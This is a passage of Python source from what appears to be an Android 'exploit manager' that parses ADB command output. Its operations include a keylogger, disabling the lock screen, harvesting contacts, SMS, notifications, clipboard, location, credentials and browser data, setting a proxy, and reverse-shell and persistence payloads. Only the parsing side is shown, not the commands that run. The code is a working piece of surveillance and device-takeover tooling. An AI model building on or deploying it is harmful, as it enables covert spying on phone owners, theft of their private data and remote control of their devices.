OSError): pass items.append(entry) return {'success': True, key: items, 'count': len(items)} if op == '/recon/contacts': contacts = [] for line in lines: if 'Row:' not in line: continue entry = {} for m in re.finditer(r'(\w+)=([^,\n]+)', line): entry[m.group(1)] = m.group(2).strip() if entry: contacts.append(entry) return {'success': True, 'contacts': contacts, 'count': len(contacts)} # ── Screen ── if op == '/screen/capture': # raw contains base64-encoded PNG b64 = raw.strip() if b64: return {'success': True, 'base64_png': b64, 'data_url': 'data:image/png;base64,' + b64} return {'success': False, 'error': 'Screenshot failed or empty output'} if op == '/screen/tap': return {'success': 'error' not in raw.lower(), 'x': p.get('x'), 'y': p.get('y')} if op == '/screen/swipe': return {'success': 'error' not in raw.lower()} if op == '/screen/text': return {'success': 'error' not in raw.lower(), 'text': p.get('text')} if op == '/screen/key': return {'success': 'error' not in raw.lower(), 'keycode': p.get('keycode')} if op == '/screen/dismiss-lock': return {'success': True, 'output': raw} if op == '/screen/disable-lock': return {'success': True, 'results': [{'cmd': l} for l in lines if l.strip()]} if op == '/screen/keylogger-start': pid = '' for line in lines: line = line.strip() if line.isdigit(): pid = line break return {'success': True, 'pid': pid, 'log_path': '/data/local/tmp/keylog.txt'} if op == '/screen/keylogger-stop': return {'success': True, 'output': raw} # ── Root ── if op == '/root/check': rooted = 'uid=0' in raw method = None if 'magisk' in raw.lower(): method = 'Magisk' elif '/system/xbin/su' in raw: method = 'SuperSU' build_type = '' for line in lines: if line.strip() in ('user', 'userdebug', 'eng'): build_type = line.strip() return {'rooted': rooted, 'method': method, 'details': {'build_type': build_type, 'raw': raw}} if op == '/root/pull-patched': remote = '' for line in lines: line = line.strip() if 'magisk_patched' in line and line.endswith('.img'): remote = line break return {'success': bool(remote), 'remote_path': remote, 'note': 'Use adbPull to download this file.' if remote else 'Not found'} # ── SMS mutations ── if op in ('/sms/insert', '/sms/update', '/sms/delete', '/sms/delete-all'): return {'success': 'error' not in raw.lower(), 'output': raw} # ── RCS ── if op == '/rcs/check': has_gmessages = 'com.google.android.apps.messaging' in raw has_messages = 'com.android.messaging' in raw return {'rcs_available': has_gmessages, 'messaging_app': 'com.google.android.apps.messaging' if has_gmessages else ('com.android.messaging' if has_messages else None)} # ── Advanced ── if op == '/adv/clipboard': text = '' parts = raw.split("'") if len(parts) >= 2: text = parts[1].replace('\n', '') return {'success': True, 'clipboard': text} if op == '/adv/notifications': notifications = [] current: dict = {} for line in lines: line = line.strip() if line.startswith('NotificationRecord'): if current: notifications.append(current) current = {'raw': line} elif 'pkg=' in line and current: m = re.search(r'pkg=(\S+)', line) if m: current['package'] = m.group(1) elif 'android.title=' in line and current: current['title'] = line.split('=', 1)[1].strip() elif 'android.text=' in line and current: current['text'] = line.split('=', 1)[1].strip() if current: notifications.append(current) return {'success': True, 'notifications': notifications, 'count': len(notifications)} if op == '/adv/location': info = {'raw': raw} for line in lines: line = line.strip() if 'Last Known Location' in line or 'last location=' in line.lower(): info['last_location'] = line elif 'fused' in line.lower() and 'location' in line.lower(): info['fused'] = line return {'success': True, **info} if op == '/adv/fingerprint': # Each line is output of `getprop ` or other commands prop_names = [ 'model', 'brand', 'device', 'manufacturer', 'android', 'sdk', 'build_id', 'fingerprint', 'build_type', 'abi', 'serial_internal', ] fp: dict = {} clean_lines = [l.strip() for l in lines if l.strip()] for i, name in enumerate(prop_names): if i < len(clean_lines): fp[name] = clean_lines[i] # Last two lines: MAC and android_id if len(clean_lines) > len(prop_names): fp['mac_wifi'] = clean_lines[len(prop_names)] if len(clean_lines) > len(prop_names) + 1: fp['android_id'] = clean_lines[len(prop_names) + 1] return fp if op == '/adv/settings': settings: dict = {} namespace = 'unknown' for line in lines: line = line.strip() if '=' in line: k, _, v = line.partition('=') if namespace not in settings: settings[namespace] = {} settings[namespace][k.strip()] = v.strip() return {'success': True, 'settings': settings} if op == '/adv/media-list': files = [l.strip() for l in lines if l.strip() and not l.strip().startswith('total')] return {'success': True, 'files': files, 'count': len(files)} if op == '/adv/network-info': info: dict = {} sections = ['interfaces', 'routes', 'dns1', 'dns2', 'proxy'] clean_lines = [l.strip() for l in lines if l.strip()] for i, sec in enumerate(sections): info[sec] = clean_lines[i] if i < len(clean_lines) else '' info['raw'] = raw return info if op in ('/adv/proxy-set', '/adv/proxy-clear'): return {'success': 'error' not in raw.lower(), 'output': raw} if op == '/adv/wifi-scan': return {'success': bool(raw.strip()), 'output': raw} if op == '/adv/wifi-connect': return {'success': 'Connected' in raw or 'success' in raw.lower(), 'ssid': p.get('ssid'), 'output': raw} if op == '/adv/adb-wifi': ip = '' for line in lines: if 'src' in line: parts = line.split() if parts: ip = parts[-1] port = p.get('port', 5555) return {'success': True, 'port': port, 'ip': ip, 'connect_cmd': f'adb connect {ip}:{port}' if ip else 'Get device IP and run: adb connect :'} if op == '/adv/selinux': mode = lines[-1].strip() if lines else 'unknown' return {'success': True, 'mode': mode} if op == '/adv/remount': return {'success': 'error' not in raw.lower(), 'output': raw} if op == '/adv/logcat-sensitive': filtered = [l.strip() for l in lines if l.strip()] return {'success': True, 'lines': filtered, 'count': len(filtered)} if op == '/adv/processes': procs = [] for line in lines[1:]: parts = line.split() if len(parts) >= 3: procs.append({'pid': parts[0], 'user': parts[1], 'name': ' '.join(parts[2:])}) elif len(parts) == 2: procs.append({'pid': parts[0], 'name': parts[1]}) return {'success': True, 'processes': procs, 'count': len(procs)} if op == '/adv/ports': ports = [l.strip() for l in lines if ':' in l and ('LISTEN' in l or 'tcp' in l.lower())] return {'success': True, 'ports': ports, 'count': len(ports), 'raw': raw} if op == '/adv/modify-setting': value = lines[-1].strip() if lines else '' return {'success': True, 'namespace': p.get('namespace'), 'key': p.get('key'), 'value': value} if op in ('/adv/app-launch', '/adv/app-disable', '/adv/app-enable', '/adv/app-clear'): return {'success': 'error' not in raw.lower(), 'package': p.get('package'), 'output': raw} if op == '/adv/content-query': rows = [] for line in lines: if 'Row:' in line: entry: dict = {} for m in re.finditer(r'(\w+)=([^,\n]+)', line): entry[m.group(1)] = m.group(2).strip() rows.append(entry) return {'success': True, 'uri': p.get('uri'), 'rows': rows, 'count': len(rows)} if op == '/payload/list': payloads = [] for line in lines: if '/data/local/tmp/' in line: parts = line.split() if len(parts) >= 2: payloads.append({'pid': parts[1] if len(parts) > 1 else parts[0], 'command': line.strip()}) return {'success': True, 'payloads': payloads, 'count': len(payloads)} if op in ('/payload/execute', '/payload/reverse-shell', '/payload/persistence', '/payload/kill'): return {'success': 'error' not in raw.lower(), 'output': raw} if op == '/boot/info': info = {} prop_keys = ['android_version', 'bootloader', 'secure', 'debuggable'] clean_lines = [l.strip() for l in lines if l.strip()] for i, k in enumerate(prop_keys): info[k] = clean_lines[i] if i < len(clean_lines) else '' return info if op in ('/recon/export', '/recon/wifi', '/recon/browser', '/recon/credentials', '/apps/pull-data', '/rcs/check'): return {'success': True, 'output': raw, 'lines': lines} # Fallback — return raw output return {'output': raw, 'lines': lines} # ── Singleton ────────────────────────────────────────────────────── _manager = None def get_exploit_manager(): global _manager if _manager is None: _manager = AndroidExploitManager() return _manager